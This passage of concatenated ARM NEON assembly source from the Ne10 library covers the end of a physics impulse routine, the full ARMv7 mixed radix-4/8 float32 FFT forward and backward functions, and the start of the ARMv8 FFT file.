vld1.f32 {d4}, [r4]! @load ima
vld1.f32 {d5}, [r5]! @load imb
vld2.f32 {d6[0], d7[0]}, [r6]! @load p
vld3.f32 {d8[0], d9[0], d10[0]}, [r0] @load v_wa
vld3.f32 {d12[0], d13[0], d14[0]}, [r1] @load v_wb
vmls.f32 d8, d6, d4[0]
vmls.f32 d9, d7, d4[0]
vmul.f32 d16, d0, d7
vmls.f32 d16, d1, d6
vmls.f32 d10, d16, d4[1]
vmla.f32 d12, d6, d5[0]
vmla.f32 d13, d7, d5[0]
vmul.f32 d16, d2, d7
vmls.f32 d16, d3, d6
vmla.f32 d14, d16, d5[1]
vst3.f32 {d8[0], d9[0], d10[0]}, [r0]!
vst3.f32 {d12[0], d13[0], d14[0]}, [r1]!
apply_impulse_end:
@ return
@pop {r8}
pop {r4, r5, r6, r7}
bx lr
#endif // ENABLE_NE10_PHYSICS_APPLY_IMPULSE_VEC2F_NEON
|
open-vela/external_Ne10 | 31,634 | modules/dsp/NE10_fft_float32.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_float32.neon.s
*/
.text
.syntax unified
/* ARM register aliases */
p_fout .req r0
p_fin .req r1
p_factors .req r2
p_twiddles .req r3
stage_count .req r4
fstride .req r5
mstride .req r6
radix .req r12
p_fin0 .req r7
p_fin1 .req r8
p_fin2 .req r9
p_fin3 .req r10
p_tmp .req r11
count .req r2
fstride1 .req r2
fstep .req r7
p_out_ls .req r14
nstep .req r2
mstep .req r7
count_f .req r8
count_m .req r9
p_tw1 .req r10
p_in1 .req r11
p_out1 .req r12
tmp0 .req r9
/* NEON register aliases for the first stage */
q_in0_01 .qn q0
q_in1_01 .qn q1
q_in2_01 .qn q2
q_in3_01 .qn q3
q_s0_2 .qn q4
q_s1_2 .qn q5
q_s2_2 .qn q6
q_s3_2 .qn q7
d_s1_r2 .dn d10
d_s1_i2 .dn d11
d_s3_r2 .dn d14
d_s3_i2 .dn d15
q_out0_2 .qn q8
q_out1_2 .qn q9
q_out2_2 .qn q10
q_out3_2 .qn q11
d_out1_r15 .dn d18
d_out1_i15 .dn d19
d_out3_r37 .dn d22
d_out3_i37 .dn d23
d_in0_r .dn d0
d_in0_i .dn d1
d_in1_r .dn d2
d_in1_i .dn d3
d_in2_r .dn d4
d_in2_i .dn d5
d_in3_r .dn d6
d_in3_i .dn d7
d_in4_r .dn d8
d_in4_i .dn d9
d_in5_r .dn d10
d_in5_i .dn d11
d_in6_r .dn d12
d_in6_i .dn d13
d_in7_r .dn d14
d_in7_i .dn d15
q_in0 .qn q0
q_in1 .qn q1
q_in2 .qn q2
q_in3 .qn q3
q_in4 .qn q4
q_in5 .qn q5
q_in6 .qn q6
q_in7 .qn q7
q_sin0 .qn q8
q_sin1 .qn q9
q_sin2 .qn q10
q_sin3 .qn q11
q_sin4 .qn q12
q_sin5 .qn q13
q_sin6 .qn q14
q_sin7 .qn q15
d_sin3_r .dn d22
d_sin3_i .dn d23
d_sin5_r .dn d26
d_sin5_i .dn d27
d_sin7_r .dn d30
d_sin7_i .dn d31
d_tw_twn .dn d0
d_s3_r .dn d2
d_s3_i .dn d3
d_s7_r .dn d4
d_s7_i .dn d5
q_s3 .qn q1
q_s7 .qn q2
q_s8 .qn q11
q_s9 .qn q15
q_s10 .qn q3
q_s11 .qn q4
q_s12 .qn q5
q_s13 .qn q6
q_s14 .qn q7
q_s15 .qn q0
q_out0 .qn q1
q_out1 .qn q2
q_out2 .qn q8
q_out3 .qn q9
q_out4 .qn q10
q_out5 .qn q12
q_out6 .qn q13
q_out7 .qn q14
d_s10_r .dn d6
d_s10_i .dn d7
d_s11_r .dn d8
d_s11_i .dn d9
d_s14_r .dn d14
d_s14_i .dn d15
d_s15_r .dn d0
d_s15_i .dn d1
d_out2_r .dn d16
d_out2_i .dn d17
d_out3_r .dn d18
d_out3_i .dn d19
d_out6_r .dn d26
d_out6_i .dn d27
d_out7_r .dn d28
d_out7_i .dn d29
/* NEON register aliases for the mstride loop */
d_fin0_r .dn d0
d_fin0_i .dn d1
d_fin1_r .dn d2
d_fin1_i .dn d3
d_fin2_r .dn d4
d_fin2_i .dn d5
d_fin3_r .dn d6
d_fin3_i .dn d7
d_tw0_r .dn d8
d_tw0_i .dn d9
d_tw1_r .dn d10
d_tw1_i .dn d11
d_tw2_r .dn d12
d_tw2_i .dn d13
q_fin0 .qn q0
q_scr0 .qn q15
q_scr1 .qn q7
q_scr2 .qn q8
q_scr3 .qn q9
q_scr4 .qn q10
q_scr5 .qn q11
q_scr6 .qn q12
q_scr7 .qn q13
d_scr1_r .dn d14
d_scr1_i .dn d15
d_scr2_r .dn d16
d_scr2_i .dn d17
d_scr3_r .dn d18
d_scr3_i .dn d19
d_scr5_r .dn d22
d_scr5_i .dn d23
d_scr7_r .dn d26
d_scr7_i .dn d27
q_fout0 .qn q7
q_fout2 .qn q8
q_fout1 .qn q14
q_fout3 .qn q15
d_fout0_r .dn d14
d_fout0_i .dn d15
d_fout1_r .dn d28
d_fout1_i .dn d29
d_fout2_r .dn d16
d_fout2_i .dn d17
d_fout3_r .dn d30
d_fout3_i .dn d31
d_one_by_nfft .dn d14
q_one_by_nfft .qn q9
/* radix 4 butterfly without twiddles */
.macro BUTTERFLY4X2_WITHOUT_TWIDDLES inverse
vadd.f32 q_s0_2, q_in0_01, q_in2_01
vsub.f32 q_s1_2, q_in0_01, q_in2_01
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vadd.f32 q_s2_2, q_in1_01, q_in3_01
vsub.f32 q_s3_2, q_in1_01, q_in3_01
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
vsub.f32 q_out2_2, q_s0_2, q_s2_2
vadd.f32 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vsub.f32 d_out1_r15, d_s1_r2, d_s3_i2
vadd.f32 d_out1_i15, d_s1_i2, d_s3_r2
vadd.f32 d_out3_r37, d_s1_r2, d_s3_i2
vsub.f32 d_out3_i37, d_s1_i2, d_s3_r2
.else
vadd.f32 d_out1_r15, d_s1_r2, d_s3_i2
vsub.f32 d_out1_i15, d_s1_i2, d_s3_r2
vsub.f32 d_out3_r37, d_s1_r2, d_s3_i2
vadd.f32 d_out3_i37, d_s1_i2, d_s3_r2
.endif
vtrn.32 q_out0_2, q_out1_2
vtrn.32 q_out2_2, q_out3_2
vst2.32 {q_out0_2}, [p_tmp]!
vst2.32 {q_out2_2}, [p_tmp]!
vst2.32 {q_out1_2}, [p_tmp]!
vst2.32 {q_out3_2}, [p_tmp]!
.endm
/* radix 4 butterfly with twiddles */
.macro BUTTERFLY4X2_WITH_TWIDDLES inverse, last_stage
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #16
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #16
vmov q_scr0, q_fin0
vmul.f32 d_scr1_r, d_fin1_r, d_tw0_r
vmul.f32 d_scr1_i, d_fin1_i, d_tw0_r
vmul.f32 d_scr2_r, d_fin2_r, d_tw1_r
vmul.f32 d_scr2_i, d_fin2_i, d_tw1_r
vmul.f32 d_scr3_r, d_fin3_r, d_tw2_r
vmul.f32 d_scr3_i, d_fin3_i, d_tw2_r
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
.ifeqs "\inverse", "TRUE"
vmla.f32 d_scr1_r, d_fin1_i, d_tw0_i
vmls.f32 d_scr1_i, d_fin1_r, d_tw0_i
vmla.f32 d_scr2_r, d_fin2_i, d_tw1_i
vmls.f32 d_scr2_i, d_fin2_r, d_tw1_i
vmla.f32 d_scr3_r, d_fin3_i, d_tw2_i
vmls.f32 d_scr3_i, d_fin3_r, d_tw2_i
.else
vmls.f32 d_scr1_r, d_fin1_i, d_tw0_i
vmla.f32 d_scr1_i, d_fin1_r, d_tw0_i
vmls.f32 d_scr2_r, d_fin2_i, d_tw1_i
vmla.f32 d_scr2_i, d_fin2_r, d_tw1_i
vmls.f32 d_scr3_r, d_fin3_i, d_tw2_i
vmla.f32 d_scr3_i, d_fin3_r, d_tw2_i
.endif
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
vadd.f32 q_scr4, q_scr0, q_scr2
vsub.f32 q_scr5, q_scr0, q_scr2
vadd.f32 q_scr6, q_scr1, q_scr3
vsub.f32 q_scr7, q_scr1, q_scr3
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
vld1.32 {d_one_by_nfft}, [sp]
vdup.32 q_one_by_nfft, d_one_by_nfft[0]
.endif
.endif
vadd.f32 q_fout0, q_scr4, q_scr6
vsub.f32 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vsub.f32 d_fout1_r, d_scr5_r, d_scr7_i
vadd.f32 d_fout1_i, d_scr5_i, d_scr7_r
vadd.f32 d_fout3_r, d_scr5_r, d_scr7_i
vsub.f32 d_fout3_i, d_scr5_i, d_scr7_r
.else
vadd.f32 d_fout1_r, d_scr5_r, d_scr7_i
vsub.f32 d_fout1_i, d_scr5_i, d_scr7_r
vsub.f32 d_fout3_r, d_scr5_r, d_scr7_i
vadd.f32 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
vmul.f32 q_fout0, q_fout0, q_one_by_nfft
vmul.f32 q_fout2, q_fout2, q_one_by_nfft
vmul.f32 q_fout1, q_fout1, q_one_by_nfft
vmul.f32 q_fout3, q_fout3, q_one_by_nfft
.endif
.endif
vst2.32 {d_fout0_r, d_fout0_i}, [p_out1], mstep
vst2.32 {d_fout1_r, d_fout1_i}, [p_out1], mstep
vst2.32 {d_fout2_r, d_fout2_i}, [p_out1], mstep
vst2.32 {d_fout3_r, d_fout3_i}, [p_out1], mstep
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #16
.endm
/* radix 8 butterfly without twiddles */
.macro BUTTERFLY8X2_WITHOUT_TWIDDLES inverse
/**
* q_in0: Fin1[0]
* q_in1: Fin1[0 + fstride]
* q_in2: Fin1[fstride1]
* q_in3: Fin1[fstride1 + fstride]
* q_in4: Fin1[fstride1*2]
* q_in5: Fin1[fstride1*2 + fstride]
* q_in6: Fin1[fstride1*3]
* q_in7: Fin1[fstride1*3 + fstride]
*
*/
adr tmp0, .L_TW_81
vld2.32 {d_in0_r, d_in0_i}, [p_in1:64], fstep
vld2.32 {d_in2_r, d_in2_i}, [p_in1:64], fstep
vld2.32 {d_in4_r, d_in4_i}, [p_in1:64], fstep
vld2.32 {d_in6_r, d_in6_i}, [p_in1:64], fstep
vld2.32 {d_in1_r, d_in1_i}, [p_in1:64], fstep
vld2.32 {d_in3_r, d_in3_i}, [p_in1:64], fstep
vld2.32 {d_in5_r, d_in5_i}, [p_in1:64], fstep
vld2.32 {d_in7_r, d_in7_i}, [p_in1:64], fstep
/* radix 4 butterfly without twiddles */
vadd.f32 q_sin0, q_in0, q_in1
vsub.f32 q_sin1, q_in0, q_in1
vld1.32 {d_tw_twn}, [tmp0]
vadd.f32 q_sin2, q_in2, q_in3
vsub.f32 q_sin3, q_in2, q_in3
vadd.f32 q_sin4, q_in4, q_in5
vsub.f32 q_sin5, q_in4, q_in5
vadd.f32 q_sin6, q_in6, q_in7
vsub.f32 q_sin7, q_in6, q_in7
.ifeqs "\inverse", "TRUE"
vneg.f32 d_sin5_i, d_sin5_i
vsub.f32 d_s3_r, d_sin3_r, d_sin3_i
vadd.f32 d_s3_i, d_sin3_i, d_sin3_r
vadd.f32 d_s7_r, d_sin7_r, d_sin7_i
vsub.f32 d_s7_i, d_sin7_i, d_sin7_r
.else
vneg.f32 d_sin5_r, d_sin5_r
vadd.f32 d_s3_r, d_sin3_r, d_sin3_i
vsub.f32 d_s3_i, d_sin3_i, d_sin3_r
vsub.f32 d_s7_r, d_sin7_r, d_sin7_i
vadd.f32 d_s7_i, d_sin7_i, d_sin7_r
.endif
vswp d_sin5_r, d_sin5_i
vmul.f32 q_s3, q_s3, d_tw_twn[0]
vmul.f32 q_s7, q_s7, d_tw_twn[1]
/* radix 2 butterfly */
vadd.f32 q_s8, q_sin0, q_sin4
vadd.f32 q_s9, q_sin1, q_sin5
vsub.f32 q_s10, q_sin0, q_sin4
vsub.f32 q_s11, q_sin1, q_sin5
/* radix 2 butterfly */
vadd.f32 q_s12, q_sin2, q_sin6
vadd.f32 q_s13, q_s3, q_s7
vsub.f32 q_s14, q_sin2, q_sin6
vsub.f32 q_s15, q_s3, q_s7
vsub.f32 q_out4, q_s8, q_s12
vsub.f32 q_out5, q_s9, q_s13
vadd.f32 q_out0, q_s8, q_s12
vadd.f32 q_out1, q_s9, q_s13
.ifeqs "\inverse", "TRUE"
vsub.f32 d_out2_r, d_s10_r, d_s14_i
vadd.f32 d_out2_i, d_s10_i, d_s14_r
vsub.f32 d_out3_r, d_s11_r, d_s15_i
vadd.f32 d_out3_i, d_s11_i, d_s15_r
vadd.f32 d_out6_r, d_s10_r, d_s14_i
vsub.f32 d_out6_i, d_s10_i, d_s14_r
vadd.f32 d_out7_r, d_s11_r, d_s15_i
vsub.f32 d_out7_i, d_s11_i, d_s15_r
.else
vadd.f32 d_out2_r, d_s10_r, d_s14_i
vsub.f32 d_out2_i, d_s10_i, d_s14_r
vadd.f32 d_out3_r, d_s11_r, d_s15_i
vsub.f32 d_out3_i, d_s11_i, d_s15_r
vsub.f32 d_out6_r, d_s10_r, d_s14_i
vadd.f32 d_out6_i, d_s10_i, d_s14_r
vsub.f32 d_out7_r, d_s11_r, d_s15_i
vadd.f32 d_out7_i, d_s11_i, d_s15_r
.endif
vtrn.32 q_out0, q_out1
vtrn.32 q_out2, q_out3
vtrn.32 q_out4, q_out5
vtrn.32 q_out6, q_out7
vst2.32 {q_out0}, [p_out1]!
vst2.32 {q_out2}, [p_out1]!
vst2.32 {q_out4}, [p_out1]!
vst2.32 {q_out6}, [p_out1]!
vst2.32 {q_out1}, [p_out1]!
vst2.32 {q_out3}, [p_out1]!
vst2.32 {q_out5}, [p_out1]!
vst2.32 {q_out7}, [p_out1]!
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #16
.endm
.align 4
.L_TW_81:
.float 0.70710678
.float -0.70710678
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_forward_float32_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_float32_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "FALSE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "FALSE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_float32_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_float32_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_float32_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* calculate 1/nfft for the last stage */
mul tmp0, radix, fstride
vmov s1, tmp0
vmov.f32 s0, #1.0
vcvt.f32.s32 s1, s1
vdiv.f32 s0, s0, s1
vpush {s0, s1}
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "TRUE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_inverse_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #112]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "TRUE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_inverse_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #112]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_end:
/*Return From Function*/
vpop {s0, s1}
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_float32_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 38,425 | modules/dsp/NE10_fft_float32.neonv8.S | /*
* Copyright 2014-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_float32.neonv8.S
*/
.text
/* ARM register aliases */
#define p_fout x0
#define p_fin x1
#define p_factors x2
#define p_twiddles x3
#define p_buffer x4
#define stage_count x5
#define fstride x6
#define mstride x7
#define p_out_ls x17
#define radix x8
#define p_fin0 x9
#define p_fin1 x10
#define p_fin2 x11
#define p_fin3 x12
#define p_tmp x13
#define count x14
#define fstride1 x15
#define fstep x8
#define nstep x9
#define mstep x10
#define count_f x11
#define count_m x12
#define p_tw1 x13
#define p_in1 x14
#define p_out1 x15
#define tmp0 x16
/* NEON register aliases for the first stage */
#define q_in0_r v0.4s
